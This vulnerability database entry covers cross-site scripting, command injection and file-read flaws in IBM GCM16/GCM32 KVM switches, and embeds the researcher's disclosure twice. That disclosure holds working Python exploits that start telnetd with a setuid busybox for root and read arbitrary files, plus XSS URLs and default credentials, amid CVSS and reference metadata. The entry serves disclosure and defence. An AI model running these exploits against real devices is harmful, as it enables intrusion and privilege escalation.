VAR-201408-0279
Vulnerability from variot - Updated: 2025-04-13 23:05Multiple cross-site scripting (XSS) vulnerabilities on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to kvm.cgi or (2) the key parameter to avctalert.php. IBM 1754 GCM16 and GCM32 Global Console Managers are prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The following versions are vulnerable: IBM 1754 GCM16 Global Console Manager running firmware 1.20.0.22575 and prior IBM 1754 GCM32 Global Console Manager running firmware 1.20.0.22575 and prior. IBM 1754 GCM16 and GCM32 Global Console Managers (GCM) are both 1754 series KVM switch products of IBM Corporation in the United States. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access. The vulnerability stems from insufficient filtering of the 'query' string in the kvm.cgi file and insufficient filtering of the 'key' parameter in the avctalert.php script . Product description The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. Versions v1.20.0.22575 and prior are vulnerables. Note that this vulnerability is also present in some DELL and probably other vendors of this rebranded KVM. I contacted Dell but no response has been received.
*1. Remote code execution * CVEID: CVE-2014-2085 Description: Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch. PoC of this vulnerability:
!/usr/bin/python"""
Exploit for Avocent KVM switch v1.20.0.22575. Remote code execution with privilege elevation. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. Default user is "Admin" with blank password. After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su -" to gain root (password "root") alex.a.bravo@gmail.com """
from StringIO import StringIO import pycurl import os
sessid = "1111111111" target = "192.168.0.10"
durl = "https://" + target + "/systest.php?lpres=;%20/usr/ sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod% 206755%20/tmp/su%20;"
storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid)
try: print "[] Sending GET to " + target + " with session id " + sessid + "..." c.perform() c.close() except: print "" finally: print "[] Done" print "[] Trying telnet..." print "[] Login as target/target, then do /tmp/su - and enter password \"root\"" os.system("telnet " + target)
*2. Arbitrary file read * CVEID: CVE-2014-3081 Description: This device allows any authenticated user to read arbitrary files. Files can be anywhere on the target.
PoC of this vulnerability:
!/usr/bin/python
""" This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to read arbitrary files on device. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. alex.a.bravo@gmail.com """
from StringIO import StringIO import pycurl
sessid = "1111111111" target = "192.168.0.10" file = "/etc/IBM_user.dat"
durl = "https://" + target + "/prodtest.php?engage=video_ bits&display=results&filename=" + file
storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid)
try: c.perform() c.close() except: print ""
content = storage.getvalue() print content.replace("","").replace("","")
3. Cross site scripting non-persistent CVEID: CVE-2014-3080 Description: System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input.
Examples: http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
Vendor Response: IBM release 1.20.20.23447 firmware
Timeline: 2014-05-20 - Vendor (PSIRT) notified 2014-05-21 - Vendor assigns internal ID 2014-07-16 - Patch Disclosed 2014-07-17 - Vulnerability disclosed
External Information: Info about the vulnerability (spanish): http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983
--
Alejandro Alvarez Bravo alex.a.bravo@gmail.com
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201408-0279",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "global console manager 32",
"scope": "lte",
"trust": 1.0,
"vendor": "ibm",
"version": "1.20.0.22575"
},
{
"model": "global console manager 16",
"scope": "lte",
"trust": 1.0,
"vendor": "ibm",
"version": "1.20.0.22575"
},
{
"model": "1754 gcm16 global console manager",
"scope": "lt",
"trust": 0.8,
"vendor": "ibm",
"version": "1.20.20.23447"
},
{
"model": "1754 gcm32 global console manager",
"scope": "lt",
"trust": 0.8,
"vendor": "ibm",
"version": "1.20.20.23447"
},
{
"model": "global console manager 16",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.20.0.22575"
},
{
"model": "global console manager 32",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.20.0.22575"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003831"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-642"
},
{
"db": "NVD",
"id": "CVE-2014-3080"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:ibm:global_console_manager_16_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:ibm:global_console_manager_32_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003831"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alejandro Alvarez Bravo",
"sources": [
{
"db": "BID",
"id": "68777"
},
{
"db": "PACKETSTORM",
"id": "127543"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-642"
}
],
"trust": 1.0
},
"cve": "CVE-2014-3080",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2014-3080",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-71019",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-3080",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2014-3080",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201407-642",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-71019",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-71019"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003831"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-642"
},
{
"db": "NVD",
"id": "CVE-2014-3080"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to kvm.cgi or (2) the key parameter to avctalert.php. IBM 1754 GCM16 and GCM32 Global Console Managers are prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. \nThe following versions are vulnerable:\nIBM 1754 GCM16 Global Console Manager running firmware 1.20.0.22575 and prior\nIBM 1754 GCM32 Global Console Manager running firmware 1.20.0.22575 and prior. IBM 1754 GCM16 and GCM32 Global Console Managers (GCM) are both 1754 series KVM switch products of IBM Corporation in the United States. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access. The vulnerability stems from insufficient filtering of the \u0027query\u0027 string in the kvm.cgi file and insufficient filtering of the \u0027key\u0027 parameter in the avctalert.php script . *Product description*\n The IBM 1754 GCM family provides KVM over IP and serial console management\ntechnology in a single appliance. Versions v1.20.0.22575 and prior are\nvulnerables. \n Note that this vulnerability is also present in some DELL and probably\nother vendors of this rebranded KVM. I contacted Dell but no response has\nbeen received. \n\n *1. Remote code execution *\n CVEID: CVE-2014-2085\n Description: Improperly sanitized input may allow a remote authenticated\nattacker to perform remote code execution on the GCM KVM switch. \n PoC of this vulnerability:\n\n#!/usr/bin/python\"\"\"\nExploit for Avocent KVM switch v1.20.0.22575. \nRemote code execution with privilege elevation. \nSessionId (avctSessionId) is neccesary for this to work, so you need a\nvalid user. Default user is \"Admin\" with blank password. \nAfter running exploit, connect using telnet to device with user target\n(pass: target) then do \"/tmp/su -\" to gain root (password \"root\")\nalex.a.bravo@gmail.com\n\"\"\"\n\nfrom StringIO import StringIO\nimport pycurl\nimport os\n\nsessid = \"1111111111\"\ntarget = \"192.168.0.10\"\n\ndurl = \"https://\" + target + \"/systest.php?lpres=;%20/usr/\nsbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%\n206755%20/tmp/su%20;\"\n\nstorage = StringIO()\nc = pycurl.Curl()\nc.setopt(c.URL, durl)\nc.setopt(c.SSL_VERIFYPEER,0)\nc.setopt(c.SSL_VERIFYHOST,0)\nc.setopt(c.WRITEFUNCTION,storage.write)\nc.setopt(c.COOKIE,\u0027avctSessionId=\u0027 + sessid)\n\ntry:\n print \"[*] Sending GET to \" + target + \" with session id \" + sessid\n+ \"...\"\n c.perform()\n c.close()\nexcept:\n print \"\"\nfinally:\n print \"[*] Done\"\nprint \"[*] Trying telnet...\"\nprint \"[*] Login as target/target, then do /tmp/su - and enter password\n\\\"root\\\"\"\nos.system(\"telnet \" + target)\n\n*2. Arbitrary file read *\n CVEID: CVE-2014-3081\n Description: This device allows any authenticated user to read arbitrary\nfiles. Files can be anywhere on the target. \n\n PoC of this vulnerability:\n\n#!/usr/bin/python\n\"\"\"\nThis exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to\nread arbitrary files on device. \nSessionId (avctSessionId) is neccesary for this to work, so you need a\nvalid user. \nalex.a.bravo@gmail.com\n\"\"\"\n\nfrom StringIO import StringIO\nimport pycurl\n\nsessid = \"1111111111\"\ntarget = \"192.168.0.10\"\nfile = \"/etc/IBM_user.dat\"\n\ndurl = \"https://\" + target + \"/prodtest.php?engage=video_\nbits\u0026display=results\u0026filename=\" + file\n\nstorage = StringIO()\nc = pycurl.Curl()\nc.setopt(c.URL, durl)\nc.setopt(c.SSL_VERIFYPEER,0)\nc.setopt(c.SSL_VERIFYHOST,0)\nc.setopt(c.WRITEFUNCTION,storage.write)\nc.setopt(c.COOKIE,\u0027avctSessionId=\u0027 + sessid)\n\ntry:\n c.perform()\n c.close()\nexcept:\n print \"\"\n\ncontent = storage.getvalue()\nprint content.replace(\"\u003ctd\u003e\",\"\").replace(\"\u003c/td\u003e\",\"\")\n\n*3. Cross site scripting non-persistent*\n CVEID: CVE-2014-3080\n Description: System is vulnerable to cross-site scripting, caused by\nimproper validation of user-supplied input. \n\n Examples:\nhttp://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E\nhttps://kvm/avctalert.php?arg1=dadadasdasd\u0026arg2=dasdasdas\u0026key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E\n\n*Vendor Response:*\nIBM release 1.20.20.23447 firmware\n\n*Timeline:*\n2014-05-20 - Vendor (PSIRT) notified\n2014-05-21 - Vendor assigns internal ID\n2014-07-16 - Patch Disclosed\n2014-07-17 - Vulnerability disclosed\n\n*External Information:*\nInfo about the vulnerability (spanish):\nhttp://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html\nIBM Security Bulletin:\nhttp://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983\n\n-- \n--\nAlejandro Alvarez Bravo\nalex.a.bravo@gmail.com\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-3080"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003831"
},
{
"db": "BID",
"id": "68777"
},
{
"db": "VULHUB",
"id": "VHN-71019"
},
{
"db": "PACKETSTORM",
"id": "127543"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-71019",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-71019"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-3080",
"trust": 2.9
},
{
"db": "BID",
"id": "68777",
"trust": 2.0
},
{
"db": "EXPLOIT-DB",
"id": "34132",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "127543",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003831",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201407-642",
"trust": 0.7
},
{
"db": "SECUNIA",
"id": "60260",
"trust": 0.6
},
{
"db": "XF",
"id": "93929",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-71019",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-71019"
},
{
"db": "BID",
"id": "68777"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003831"
},
{
"db": "PACKETSTORM",
"id": "127543"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-642"
},
{
"db": "NVD",
"id": "CVE-2014-3080"
}
]
},
"id": "VAR-201408-0279",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-71019"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T23:05:08.269000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "MIGR-5095983",
"trust": 0.8,
"url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003831"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-71019"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003831"
},
{
"db": "NVD",
"id": "CVE-2014-3080"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/68777"
},
{
"trust": 1.7,
"url": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/34132/"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2014/jul/113"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/127543/ibm-1754-gcm-kvm-code-execution-file-read-xss.html"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93929"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3080"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3080"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/93929"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/60260"
},
{
"trust": 0.1,
"url": "http://kvm/kvm.cgi?%3cscript%3ealert%28%22aaa%22%29%3c/script%3e"
},
{
"trust": 0.1,
"url": "https://\""
},
{
"trust": 0.1,
"url": "http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html"
},
{
"trust": 0.1,
"url": "https://kvm/avctalert.php?arg1=dadadasdasd\u0026arg2=dasdasdas\u0026key=%3cscript%3ealert%28%22aaa%22%29%3c/script%3e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-2085"
},
{
"trust": 0.1,
"url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3080"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3081"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-71019"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003831"
},
{
"db": "PACKETSTORM",
"id": "127543"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-642"
},
{
"db": "NVD",
"id": "CVE-2014-3080"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-71019"
},
{
"db": "BID",
"id": "68777"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003831"
},
{
"db": "PACKETSTORM",
"id": "127543"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-642"
},
{
"db": "NVD",
"id": "CVE-2014-3080"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-08-17T00:00:00",
"db": "VULHUB",
"id": "VHN-71019"
},
{
"date": "2014-07-14T00:00:00",
"db": "BID",
"id": "68777"
},
{
"date": "2014-08-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-003831"
},
{
"date": "2014-07-21T19:57:35",
"db": "PACKETSTORM",
"id": "127543"
},
{
"date": "2014-07-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201407-642"
},
{
"date": "2014-08-17T23:55:06.853000",
"db": "NVD",
"id": "CVE-2014-3080"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-29T00:00:00",
"db": "VULHUB",
"id": "VHN-71019"
},
{
"date": "2014-07-14T00:00:00",
"db": "BID",
"id": "68777"
},
{
"date": "2014-08-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-003831"
},
{
"date": "2014-08-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201407-642"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-3080"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201407-642"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "IBM GCM16 and GCM32 Global Console Manager Cross-site scripting vulnerability in switch firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003831"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201407-642"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.